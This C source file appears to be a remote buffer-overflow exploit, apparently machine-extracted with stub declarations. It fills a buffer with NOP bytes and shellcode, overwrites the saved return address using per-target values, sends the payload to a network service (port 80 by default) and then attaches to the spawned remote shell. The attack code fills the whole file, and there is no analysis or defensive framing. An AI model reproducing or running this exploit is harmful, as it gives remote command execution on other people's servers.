
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {scalar_t__ retaddress; int bufsize; int junk; char* shellcode; long offset; } ;


 int NOP ;
 int atoi (int ) ;
 int close (int) ;
 int getopt (int,char**,char*) ;
 scalar_t__ malloc (int) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int ,int) ;
 int open_socket (int) ;
 int optarg ;
 int sh (int) ;
 int sleep (int) ;
 char* static_crap ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 TYPE_1__* targets ;
 int usage (char*) ;
 int write (int,char*,int) ;

int main(int argc, char **argv){

  char *buffer,*tmp;
  long retaddress;
  char rcv[200];
  int fd,i,arg,debug=0,type=0,port=80,offset=250;

  if(argc < 2) { usage(argv[0]); }

  while ((arg = getopt (argc, argv, "dh:o:l:p:t:")) != -1){
    switch (arg){
    case 'd':
 debug = 1;
 break;
    case 'o':
      offset = atoi(optarg);
      break;
    case 'p':
      port = atoi(optarg);
      break;
    case 't':
      type = atoi(optarg);
      break;
    default :
      usage(argv[0]);
    }
  }

  if((targets[type].retaddress) != 0) {
    buffer = (char *)malloc((targets[type].bufsize));



    if(targets[type].junk == 1) {

    tmp = (char *)malloc(strlen(static_crap) + strlen(targets[type].shellcode));

    strcpy(tmp,targets[type].shellcode);
    strcat(tmp,static_crap);

    targets[type].shellcode = tmp;

    }

    memset(buffer,NOP,targets[type].bufsize);
    memcpy(buffer + (targets[type].bufsize) - (strlen(targets[type].shellcode) + 8) ,targets[type].
shellcode,strlen(targets[type].shellcode));


    *(long *)&buffer[(targets[type].bufsize) - 8] = (targets[type].retaddress - targets[type].offset);




    if(type == 4) {
       *(long *)&buffer[(targets[type].bufsize) - 8] = 0xbfbff654;
    }

    *(long *)&buffer[(targets[type].bufsize) - 4] = (targets[type].retaddress - targets[type].offset);


    if(debug == 1) {
    *(long *)&buffer[(targets[type].bufsize) - 8] = 0x41414141;
    *(long *)&buffer[(targets[type].bufsize) - 4] = 0x41414141;
    }
  }

  fd = open_socket(port);

  write(fd,buffer,strlen(buffer));
  write(fd,"\n",1);
  write(fd,"\n",1);

  sleep(1);
  sh(fd);

  close(fd);
  return 0;

}
